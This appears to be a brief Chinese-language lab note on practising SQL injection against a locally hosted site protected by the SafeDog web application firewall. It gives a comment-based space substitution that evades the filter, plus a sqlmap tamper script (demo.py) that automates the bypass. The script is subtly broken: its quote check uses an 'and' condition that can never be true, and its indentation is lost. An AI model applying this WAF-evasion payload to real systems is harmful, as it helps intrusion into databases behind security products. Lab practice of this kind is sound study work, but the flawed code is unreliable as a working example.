本地搭建sql注入网站练习
测试安全狗,输入不合法参数被安全狗拦截:
使用sqlmap:
检测到防护机制,失败;
先手工尝试绕过安全狗:
将空格替换为 “/*//\*//\*\/c*/” 成功绕过安全狗;
写个sqlmap脚本:
#demo.py
def tamper(payload,**kwargs):
retVal = payload
quote=False
if payload:
retVal = ''
for i in payload:
if i =="'" and i=='"':
quote = not quote
elif i.isspace() and not quote:
retVal+='/*//\*//\*\/c*/'
else:
retVal+=i
return retVal
加上脚本继续跑:
成功!(之后试了几次就不行了,与安全狗的检测机制有关。。。)